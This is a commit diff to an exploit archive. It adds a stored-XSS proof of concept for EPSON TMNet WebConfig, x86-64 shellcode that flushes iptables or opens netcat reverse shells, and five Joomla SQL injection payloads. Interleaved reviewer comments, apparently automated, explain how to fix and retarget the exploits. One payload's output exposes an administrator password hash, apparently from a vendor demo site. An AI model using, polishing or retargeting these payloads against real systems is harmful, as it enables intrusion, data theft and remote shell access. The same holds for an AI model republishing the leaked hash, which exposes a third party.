DB: 2017-03-06
9 new exploits Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes) Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes) Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes) Joomla! Component com_jumi - (fileid) Blind SQL Injection Joomla! Component Jumi - 'fileid' Parameter Blind SQL Injection EPSON TMNet WebConfig 1.00 - Cross-Site Scripting Joomla! Component JUX EventOn 1.0.1 - 'id' Parameter SQL Injection Joomla! Component Monthly Archive 3.6.4 - 'author_form' Parameter SQL Injection Joomla! Component AYS Quiz 1.0 - 'id' Parameter SQL Injection Joomla! Component Content ConstructionKit 1.1 - SQL Injection Joomla! Component AltaUserPoints 1.1 - 'userid' Parameter SQL Injection
This commit is contained in:
parent
d3106003d4
commit
4811e36301
10 changed files with 378 additions and 1 deletions
11
files.csv
11
files.csv
|
@ -15928,6 +15928,9 @@ id,file,description,date,author,platform,type,port
|
|||
41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
|
||||
41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
|
||||
41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -21317,7 +21320,7 @@ id,file,description,date,author,platform,type,port
|
|||
8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection",2009-06-15,d3v1l,php,webapps,0
|
||||
8966,platforms/php/webapps/8966.txt,"PHPortal 1 - 'topicler.php id' SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0
|
||||
8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Cross-Site Scripting",2009-06-15,"ThE g0bL!N",php,webapps,0
|
||||
8968,platforms/php/webapps/8968.txt,"Joomla! Component com_jumi - (fileid) Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps,0
|
||||
8968,platforms/php/webapps/8968.txt,"Joomla! Component Jumi - 'fileid' Parameter Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps,0
|
||||
8974,platforms/php/webapps/8974.txt,"XOOPS 2.3.3 - '.htaccess' Remote File Disclosure",2009-06-16,daath,php,webapps,0
|
||||
8975,platforms/php/webapps/8975.txt,"PHPFK 7.03 - 'page_bottom.php' Local File Inclusion",2009-06-17,ahmadbady,php,webapps,0
|
||||
8977,platforms/php/webapps/8977.txt,"TekBase All-in-One 3.1 - Multiple SQL Injections",2009-06-17,n3wb0ss,php,webapps,0
|
||||
|
@ -37416,3 +37419,9 @@ id,file,description,date,author,platform,type,port
|
|||
41499,platforms/jsp/webapps/41499.txt,"NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection",2017-02-23,MrChaZ,jsp,webapps,0
|
||||
41500,platforms/php/webapps/41500.txt,"Joomla! Component Coupon 3.5 - SQL Injection",2017-03-03,"Ihsan Sencan",php,webapps,0
|
||||
41501,platforms/php/webapps/41501.txt,"pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery",2017-03-03,"Yann CAM",php,webapps,0
|
||||
41502,platforms/hardware/webapps/41502.txt,"EPSON TMNet WebConfig 1.00 - Cross-Site Scripting",2017-03-03,"Michael Benich",hardware,webapps,0
|
||||
41504,platforms/php/webapps/41504.txt,"Joomla! Component JUX EventOn 1.0.1 - 'id' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
|
||||
41505,platforms/php/webapps/41505.txt,"Joomla! Component Monthly Archive 3.6.4 - 'author_form' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
|
||||
41506,platforms/php/webapps/41506.txt,"Joomla! Component AYS Quiz 1.0 - 'id' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
|
||||
41507,platforms/php/webapps/41507.txt,"Joomla! Component Content ConstructionKit 1.1 - SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
|
||||
41508,platforms/php/webapps/41508.txt,"Joomla! Component AltaUserPoints 1.1 - 'userid' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
|
||||
|
|
|
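Review bot: The new row for 41510 records its path as `platforms/lin_x86-64/shellcode/41510.nsam`, while the neighbouring shellcode rows (41498, 41503, 41509) all use `.nasm`; the file added by this commit carries the same `.nsam` name, so this reads as a typo that was propagated into the index rather than a deliberate choice. Because the `file` column is how an entry resolves to a path, the row and the file have to be renamed together, to `41510,platforms/lin_x86-64/shellcode/41510.nasm,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0`. The file is too large to render here, so this covers only the three hunks shown.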
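--- a/platforms/hardware/webapps/41502.txt
+++ b/platforms/hardware/webapps/41502.txt
@@ -0,0 +1,57 @@
+# Exploit Title: Persistent XSS in EPSON TMNet WebConfig Ver. 1.00
+# Google Dork: intitle:"EPSON TMNet WebConfig Ver.1.00"
+# Date: 3/3/2017
+# Exploit Author: Michael Benich
+# Vendor Homepage: https://www.epson-biz.com/
+# Software Link: https://c4b.epson-biz.com/modules/community/index.php?content_id=50
+# Version: 1.00
+# CVE: CVE-2017-6443
+# Contact: benichmt1@protonmail.com // @benichmt1
+#####################################################################################
+
+Summary:
+Persistent cross-site scripting (XSS) in the web interface of Epson's TMNet WebConfig Ver 1.00 application allows a remote attacker to introduce arbitary Javascript via manipulation of an unsanitized POST parameter.
+
+Steps to reproduce:
+
+1)Make a POST request using Burp Proxy or other application
+
+------------------------------------------------------------------------------------------
+POST /Forms/oadmin_1 HTTP/1.1
+Host: XXX.XXX.XXX.XXX
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://XXX.XXX.XXX.XXX/oadmin.htm
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 47
+
+W_AD1=<script>window.alert(0)</script>&W_Link1=&Submit=SUBMIT
+
+------------------------------------------------------------------------------------------
+2) Browsing to the main page will execute your script. This remains persistent for any user who then visits this page.
+
+GET /istatus.htm HTTP/1.1
+Host: XXX.XXX.XXX.XXX
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://XXX.XXX.XXX.XXX/side.htm
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+------------------------------------------------------------------------------------------
+
+Timeline:
+
+------------------------------------------------------------------------------------------
+12/1/2016 - Discovery.
+12/9/2016 - Emailed support@ , info@ , and domain-admin@ emails. No response.
+12/16/2016 - Pinged on Twitter. Recommended to contact through support.
+12/22/2016 - Reached on LinkedIn directly to individual listed as Security Engineer and asked to find proper security contact channel. No response, but the connection request was accepted.
+3/3/2017 - Disclosure
+------------------------------------------------------------------------------------------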
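Review bot: The `Content-Length: 47` header in the reproduction POST does not match the body below it — `W_AD1=<script>window.alert(0)</script>&W_Link1=&Submit=SUBMIT` is 61 bytes, and 47 is exactly the length up to `W_Link1=`, so a client that honours the header truncates the request and the `Submit` field never reaches the device. Replaying from a raw-socket tool will therefore behave differently from Burp, which recomputes the length; the header should read `Content-Length: 61` (or be dropped so the tool computes it), and the `<`/`>` are sent unencoded, which is outside the form-urlencoded grammar even if the embedded server accepts it. The advisory also never says whether `/Forms/oadmin_1` or `oadmin.htm` require authentication, which decides whether this is a pre-auth stored XSS or an admin-to-admin one; one line such as `Authentication required: yes/no` under the summary would settle it.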
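--- a/platforms/lin_x86-64/shellcode/41503.nasm
+++ b/platforms/lin_x86-64/shellcode/41503.nasm
@@ -0,0 +1,53 @@
+;The MIT License (MIT)
+
+;Copyright (c) 2017 Robert L. Taylor
+
+;Permission is hereby granted, free of charge, to any person obtaining a
+;copy of this software and associated documentation files (the “Software”),
+;to deal in the Software without restriction, including without limitation
+;the rights to use, copy, modify, merge, publish, distribute, sublicense,
+;and/or sell copies of the Software, and to permit persons to whom the
+;Software is furnished to do so, subject to the following conditions:
+
+;The above copyright notice and this permission notice shall be included
+;in all copies or substantial portions of the Software.
+
+;The Software is provided “as is”, without warranty of any kind, express or
+;implied, including but not limited to the warranties of merchantability,
+;fitness for a particular purpose and noninfringement. In no event shall the
+;authors or copyright holders be liable for any claim, damages or other
+;liability, whether in an action of contract, tort or otherwise, arising
+;from, out of or in connection with the software or the use or other
+;dealings in the Software.
+;
+; For a detailed explanation of this shellcode see my blog post:
+; http://a41l4.blogspot.ca/2017/03/polyflushiptables1434.html
+
+global _start
+
+section .text
+
+_start:
+push 82
+pop rax
+cdq
+push rdx
+push word '-F'
+push rsp
+pop rbx
+push rdx
+mov rcx, 'iptables'
+push rcx
+shl al,1
+sub al,cl
+mov rcx, '//sbin//'
+push rcx
+push rsp
+pop rdi
+push rdx
+push rbx
+push rdi
+push rsp
+pop rsi
+syscall
+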
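Review bot: The header never states what this shellcode needs in order to work: the body ends in `execve("//sbin//iptables", ["//sbin//iptables", "-F"], NULL)` (rdx is zeroed by `cdq` and doubles as envp), which only succeeds as root/CAP_NET_ADMIN and only if the binary is at that exact path; on a system where iptables lives elsewhere the syscall returns and execution falls off the end, since there is no exit. `iptables -F` also flushes only the rules of the filter table — chain policies and the nat/mangle tables are untouched, so a `DROP` default policy keeps blocking after it runs. Suggest a header comment above `_start` such as `; execve(/sbin/iptables -F): needs root; flushes filter-table rules only, policies and other tables unchanged; returns into whatever follows if execve fails`. The `shl al,1` / `sub al,cl` pair (82*2 - 'i' = 59) is the polymorphic way of loading the execve number and deserves a one-line comment too.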
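--- a/platforms/lin_x86-64/shellcode/41509.nasm
+++ b/platforms/lin_x86-64/shellcode/41509.nasm
@@ -0,0 +1,70 @@
+;The MIT License (MIT)
+
+;Copyright (c) 2017 Robert L. Taylor
+
+;Permission is hereby granted, free of charge, to any person obtaining a
+;copy of this software and associated documentation files (the “Software”),
+;to deal in the Software without restriction, including without limitation
+;the rights to use, copy, modify, merge, publish, distribute, sublicense,
+;and/or sell copies of the Software, and to permit persons to whom the
+;Software is furnished to do so, subject to the following conditions:
+
+;The above copyright notice and this permission notice shall be included
+;in all copies or substantial portions of the Software.
+
+;The Software is provided “as is”, without warranty of any kind, express or
+;implied, including but not limited to the warranties of merchantability,
+;fitness for a particular purpose and noninfringement. In no event shall the
+;authors or copyright holders be liable for any claim, damages or other
+;liability, whether in an action of contract, tort or otherwise, arising
+;from, out of or in connection with the software or the use or other
+;dealings in the Software.
+;
+; For a detailed explanation of this shellcode see my blog post:
+; http://a41l4.blogspot.ca/2017/03/netcatrevshell1434.html
+
+global _start
+
+section .text
+
+_start:
+xor edx,edx
+push '1337'
+push rsp
+pop rcx
+
+push rdx
+mov rax,'/bin//sh'
+push rax
+push rsp
+pop rbx
+
+push rdx
+mov rax,'/bin//nc'
+push rax
+push rsp
+pop rdi
+
+push '1'
+mov rax,'127.0.0.'
+push rax
+push rsp
+pop rsi
+
+push rdx
+push word '-e'
+push rsp
+pop rax
+
+push rdx ; push null
+push rbx ; '/bin//sh'
+push rax ; '-e'
+push rcx ; '1337'
+push rsi ; '127.0.0.1'
+push rdi ; '/bin//nc'
+push rsp
+pop rsi ; address of array of pointers to strings
+
+push 59 ; execve system call
+pop rax
+syscall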
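Review bot: The connect-back target is baked into the instruction stream — `mov rax,'127.0.0.'`, `push '1'` and `push '1337'` — but nothing in the file says so or tells the reader which pushes to patch before use; the resulting call is `execve("/bin//nc", ["/bin//nc","127.0.0.1","1337","-e","/bin//sh"], NULL)`. `-e` is only understood by the traditional and ncat flavours of netcat; the OpenBSD netcat that many distributions install as `nc` rejects it, so the process exits with a usage error even though execve succeeded, and `/bin/nc` itself is not a universal path. Suggest a header comment such as `; connects back to 127.0.0.1:1337 (edit the '127.0.0.'/'1' and '1337' pushes); needs a netcat that supports -e at /bin/nc`. A note on `push '1'` that it lands above `'127.0.0.'` and supplies the NUL terminator for the address would also help anyone changing the IP to one with a different length.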
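--- a/platforms/lin_x86-64/shellcode/41510.nsam
+++ b/platforms/lin_x86-64/shellcode/41510.nsam
@@ -0,0 +1,84 @@
+;The MIT License (MIT)
+
+;Copyright (c) 2017 Robert L. Taylor
+
+;Permission is hereby granted, free of charge, to any person obtaining a
+;copy of this software and associated documentation files (the “Software”),
+;to deal in the Software without restriction, including without limitation
+;the rights to use, copy, modify, merge, publish, distribute, sublicense,
+;and/or sell copies of the Software, and to permit persons to whom the
+;Software is furnished to do so, subject to the following conditions:
+
+;The above copyright notice and this permission notice shall be included
+;in all copies or substantial portions of the Software.
+
+;The Software is provided “as is”, without warranty of any kind, express or
+;implied, including but not limited to the warranties of merchantability,
+;fitness for a particular purpose and noninfringement. In no event shall the
+;authors or copyright holders be liable for any claim, damages or other
+;liability, whether in an action of contract, tort or otherwise, arising
+;from, out of or in connection with the software or the use or other
+;dealings in the Software.
+; For a detailed explanation of this shellcode see my blog post:
+; http://a41l4.blogspot.ca/2017/03/polynetcatrevshell1434.html
+
+global _start
+
+section .text
+
+_start:
+jmp next
+sh:
+db 0x68,0x73,0x2f,0x2f,0x6e,0x69,0x62,0x2f
+nc:
+db 0x63,0x6e,0x2f,0x2f,0x6e,0x69,0x62,0x2f
+ip:
+db 0x2e,0x30,0x2e,0x30,0x2e,0x37,0x32,0x31
+handle:
+pop rcx
+lodsq
+bswap rax
+push rax
+push rsp
+push rcx
+ret
+next:
+xor edx,edx
+lea rsi,[rel sh]
+push rdx
+call handle
+pop rbx
+
+push rdx
+call handle
+pop rdi
+
+push '1'
+call handle
+pop r12
+
+push '1337'
+push rsp
+pop rcx
+
+push rdx
+push word '-e'
+push rsp
+pop rax
+
+push rdx ; push null
+push rbx ; '/bin//sh'
+push rax ; '-e'
+push rcx ; '1337'
+push r12 ; '127.0.0.1'
+push rdi ; '/bin//nc'
+push rsp
+pop rsi ; address of array of pointers to strings
+
+; some magic to put 3b (59) into RAX
+; note that this depends on the push "-e"
+; and it's position on the stack
+mov rax,[rsp + 48]
+shr rax,8
+sub rax,0x2a
+syscall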
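Review bot: `handle` walks the byte-reversed strings with `lodsq`, which advances `rsi` only while the direction flag is clear, and the code never executes `cld`; the SysV ABI guarantees DF=0 at call boundaries so this holds in the usual injection contexts, but it is an unstated assumption worth one comment on the `lodsq` line, e.g. `; assumes DF=0 (ABI guarantee) - add cld if the injection context may set it`. The "some magic" comment above `mov rax,[rsp + 48]` would be more useful as the actual derivation: `; 48 = six 8-byte argv pushes since push word '-e'; loads '-e' -> 0x652d, >>8 = 0x65, -0x2a = 0x3b (execve)`, so that a future change to the argv block is not silently wrong. The same hard-coded `127.0.0.1:1337` and netcat `-e` dependency as in 41509.nasm apply here, now split across the `ip:` bytes, `push '1'` and `push '1337'`, and deserve the same header note.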
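--- a/platforms/php/webapps/41504.txt
+++ b/platforms/php/webapps/41504.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component JUX EventOn v1.0.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jux_eventon
+# Date: 04.03.2017
+# Vendor Homepage: http://joomlaux.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/jux-eventon/
+# Demo: http://demo.joomlaux.com/extensions/eventon/
+# Version: 1.0.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jux_eventon&view=event&id=[SQL]
+# 3+union+select+1,@@version,3,4,5,6
+# # # # #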
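Review bot: The advisory stops at the payload: `Tested on: Win7 x64, Kali Linux x64` describes the attacker's workstation, while nothing records the Joomla! version the component ran under, whether the vendor was notified, or whether a fixed release exists — 41502.txt in the same commit carries a timeline and is the better template. The `3+union+select+1,@@version,3,4,5,6` payload implies the `id` value is concatenated unquoted and that the underlying query has six columns; stating both saves readers re-deriving the column count. Suggest adding `# Vendor notified: <date or not contacted>` and `# Fix: <version or none known>` to the header, and `# Parameter: id (numeric, unquoted; 6-column UNION)` above the payload.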
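--- a/platforms/php/webapps/41505.txt
+++ b/platforms/php/webapps/41505.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component Monthly Archive v3.6.4 - SQL Injection
+# Google Dork: inurl:index.php?option=com_monthlyarchive
+# Date: 04.03.2017
+# Vendor Homepage: http://web357.eu/
+# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/monthly-archive/
+# Demo: http://demo.web357.eu/joomla/en/browse/monthly-archive
+# Version: 3.6.4
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_monthlyarchive&view=monthlyarchive&month_year_form=07-2017&order=0&author_form=[SQL]
+# 1+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
+# # # # #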
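--- a/platforms/php/webapps/41506.txt
+++ b/platforms/php/webapps/41506.txt
@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Joomla! Component AYS Quiz v1.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_aysquiz
+# Date: 04.03.2017
+# Vendor Homepage: http://ays-pro.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/ays-quiz/
+# Demo: http://demo.ays-pro.com/index.php/ays-quiz
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/index.php?option=com_aysquiz&controller=question&id=[SQL]&format=raw
+# For example;
+# 1'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3,4,5-- -&format=raw
+# :title<li>whlzd_users
+# :id<li>whlzd_users
+# :name<li>whlzd_users
+# :username<li>whlzd_users
+# :email<li>whlzd_users
+# :password<li>whlzd_users
+# :block<li>whlzd_users
+# 1'+/*!50000union*/+select+/*!50000concat*/(username,/*!50000char*/(58),password),2,3,4,5+from+whlzd_users-- -&format=raw
+# <input class='ays_radio hide' type='radio' id='ans_admin:$2y$10$T7Cetq0lrME/gyxxS0usx.bh2OldeDOhccAW7Ikf33.KhbmZbEgfa'
+# Etc...
+# # # # #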
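Review bot: The sample output reproduces data pulled from a live installation — table names under the `whlzd_` prefix and an administrator bcrypt hash in `id='ans_admin:$2y$10$T7Cetq0l...'` — which, next to the `Demo: http://demo.ays-pro.com/...` line, appears to be a dump of the vendor's demo site. A real admin password hash from a system the author does not own has no place in a public PoC; it should be redacted to `ans_admin:$2y$10$[redacted]` and the prefix replaced by a placeholder such as `jos_users` before this is published. The PoC loses nothing by it: `id=1'` already shows the quoted string context, and the `<input class='ays_radio hide' ...>` line shows where the UNION result surfaces.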
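--- a/platforms/php/webapps/41507.txt
+++ b/platforms/php/webapps/41507.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Joomla! Component Content ConstructionKit v1.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_os_cck
+# Date: 04.03.2017
+# Vendor Homepage: http://ordasoft.com/
+# Software Buy: http://ordasoft.com/cck-content-construction-kit-for-joomla.html
+# Demo: http://ordasvit.com/joomla-cck-classic/
+# Version: 1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/2016-04-11-13-03-22/search?search=Ihsan_Sencan&categories[]=[SQL]&task=search&option=com_os_cck&Itemid=133
+# 9+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
+# 1062 Duplicate entry 'ordasvit_joomla-cck-classic~IhsanSencan1' for key 'group_key'
+# Etc..
+# # # # #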
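Review bot: The quoted MySQL error `1062 Duplicate entry 'ordasvit_joomla-cck-classic~IhsanSencan1'` discloses the database name of what appears to be the listed demo host (`ordasvit.com`), i.e. the PoC was apparently run against the vendor's site and its output published; the database name should be replaced with a placeholder such as `<dbname>~IhsanSencan1` before release. The injection point is the array parameter `categories[]`, which neither the title nor the `files.csv` description (`Content ConstructionKit 1.1 - SQL Injection`) names, unlike the other new rows in this commit that carry `'id' Parameter` etc.; a `# Parameter: categories[] (numeric, unquoted)` line would make it greppable and would tell the maintainer that every element of the array needs validation, not just a scalar. The `index.php/2016-04-11-13-03-22/search` path is also a site-specific SEF alias, which is worth saying so readers do not treat it as part of the component's routes.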
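--- a/platforms/php/webapps/41508.txt
+++ b/platforms/php/webapps/41508.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Joomla! Component AltaUserPoints v1.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_altauserpoints
+# Date: 04.03.2017
+# Vendor Homepage: https://www.nordmograph.com/
+# Software: https://extensions.joomla.org/extensions/extension/e-commerce/credits-a-point-systems/altauserpoints/
+# Demo: https://www.nordmograph.com/workshop/
+# Version: 1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php?option=com_altauserpoints&view=account&userid=[SQL]
+# 1'+/*!50000OR*/+1+/*!50000GROUP*/+BY+/*!50000CONCAT_WS*/(0x3a,0x496873616e53656e63616e,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- -
+# # # # #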